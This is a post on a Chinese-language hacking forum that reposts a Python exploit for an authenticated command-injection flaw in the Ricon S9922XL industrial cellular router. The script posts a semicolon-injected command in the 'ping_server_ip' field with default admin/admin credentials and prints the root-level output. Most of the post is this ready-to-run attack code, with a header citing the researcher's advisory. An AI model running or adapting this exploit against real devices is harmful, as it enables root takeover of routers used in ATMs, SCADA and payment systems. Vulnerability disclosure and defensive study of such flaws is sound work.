跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)


HACK1949

推荐的帖子

# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) 
# Date: 02.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.riconmobile.com


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
#                   Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
#            WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#

import requests,sys,re

if len(sys.argv)<3:
    print("Ricon Industrial Routers RCE")
    print("Usage: ./ricon.py [ip] [cmd]")
    sys.exit(17)
else:
    ipaddr=sys.argv[1]
    execmd=sys.argv[2]

data={'submit_class'  :'admin',
      'submit_button' :'netTest',
      'submit_type'   :'',
      'action'        :'Apply',
      'change_action' :'',
      'is_ping'       :'0',
      'ping_server_ip':';'+execmd}

htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...